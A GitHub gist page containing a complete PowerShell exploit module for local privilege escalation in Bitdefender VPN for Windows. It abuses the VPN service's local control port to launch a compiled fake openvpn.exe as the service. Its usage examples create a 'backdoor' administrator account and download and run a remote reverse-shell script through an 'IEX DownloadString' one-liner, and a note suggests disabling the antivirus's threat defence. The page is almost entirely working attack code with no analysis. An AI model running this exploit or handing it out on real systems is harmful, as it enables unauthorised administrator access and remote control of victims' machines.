Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit module for Bitdefender VPN for Windows
<#
.Synopsis
Exploit module for Bitdefender VPN for Windows
.Parameter Command
Command(s) to be executed when openvpn.exe is started
.Example
Import-Module .\Invoke-ExploitBdVpnLpe.psm1
Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"
Invoke-ExploitBdVpnLpe -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')"
Note: this proof of concept may be blocked by Bitdefender Advanced Threat Defense, disable if needed
#>
Function Invoke-ExploitBdVpnLpe {
Param([Parameter(Position = 0, Mandatory = $true, ValueFromRemainingArguments = $true)] [string[]]$Command)
If($(Get-Service -Name AfVpnService -ErrorAction Stop).Status -ne [System.ServiceProcess.ServiceControllerStatus]::Running) {
& "$env:ProgramFiles\Bitdefender\Bitdefender VPN\bdvpnuiapp.exe" "/show"
Write-Error "AfVpnService is not running, enable it by manually connecting to the VPN service"
Return
}
Function Send-Command {
Param([Parameter(Position = 0, Mandatory = $true)] [string]$Command,
[Parameter(Position = 1, Mandatory = $false)] [hashtable]$Params = @{},
[Parameter(Position = 2, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 3, Mandatory = $false)] [int]$Port = 31337)
$End = New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse($Ip)), ([int]$Port)
$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork
$Stype = [System.Net.Sockets.SocketType]::Stream
$Ptype = [System.Net.Sockets.ProtocolType]::TCP
$Params.Add("command", $Command)
$Data = [System.Text.Encoding]::UTF8.GetBytes($(ConvertTo-Json -InputObject $Params))
$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype
$Sock.Connect($End)
$null = $Sock.Send($Data)
$Buffer = New-Object byte[](1024)
$Length = $Sock.Receive($Buffer)
$Sock.Close()
Return ConvertFrom-Json -InputObject $([System.Text.Encoding]::UTF8.GetString($Buffer,0 , $Length))
}
Function Check-Vpn {
Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
Try {
Return $(Send-Command -Command "check" -Ip $Ip -Port $Port).isSuccess
} Catch {
Return $false
}
}
Function Connect-Vpn {
Param([Parameter(Position = 0, Mandatory = $false)] [string]$RemoteIp = "127.0.0.1",
[Parameter(Position = 1, Mandatory = $false)] [string]$RemotePort = "",
[Parameter(Position = 2, Mandatory = $false)] [string]$Protocol = "udp",
[Parameter(Position = 3, Mandatory = $false)] [string]$VpnExecutablePath = "$env:ProgramFiles\Bitdefender\Bitdefender VPN\AfVpnService",
[Parameter(Position = 4, Mandatory = $false)] [string]$AuthFilename = "deadebeefdeadebeefdeadebeefdeade.txt",
[Parameter(Position = 5, Mandatory = $false)] [bool]$EnableLog = $true,
[Parameter(Position = 6, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 7, Mandatory = $false)] [int]$Port = 31337)
$Params = @{
vpnExecutablePath = $VpnExecutablePath
ip = $RemoteIp
port = $RemotePort
protocol = $Protocol
authFilename = $AuthFilename
enableLog = $EnableLog
}
Return $(Send-Command -Command "connect" -Params $Params -Ip $Ip -Port $Port)
}
Function Disconnect-Vpn {
Param([Parameter(Position = 0, Mandatory = $false)] [string]$Ip = "127.0.0.1",
[Parameter(Position = 1, Mandatory = $false)] [int]$Port = 31337)
Return $(Send-Command -Command "disconnect" -Ip $Ip -Port $Port).isSuccess
}
$tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
New-Item -Type directory -Path "$tmpfolder" | Out-Null
Set-Content "$tmpfolder\payload.bat" -Encoding ASCII $Command
Set-Content "$tmpfolder\openvpn.cs" -Encoding ASCII "
class Program
{
static void Main()
{
try {
System.Diagnostics.Process.Start(`"$($tmpfolder.Replace("\", "\\"))\\payload.bat`");
} catch(System.Exception) { }
}
}
"
& "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())csc.exe" "/out:$tmpfolder\openvpn.exe" "$tmpfolder\openvpn.cs"
& "$env:ProgramFiles\Bitdefender\Bitdefender VPN\BdVpnApp.exe" "/exit"
$tcpservice = Get-NetTCPConnection -State Listen -OwningProcess $(Get-Process -Name VpnService -ErrorAction Stop).Id
If (Check-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort | Out-Null
If(Connect-Vpn -VpnExecutablePath $tmpfolder -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort) {
Start-Sleep 5
Disconnect-Vpn -Ip $tcpservice.LocalAddress -Port $tcpservice.LocalPort | Out-Null
}
}
# clean up
Remove-Item $tmpfolder -Force -Recurse
}
Export-ModuleMember -Function Invoke-ExploitBdVpnLpe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.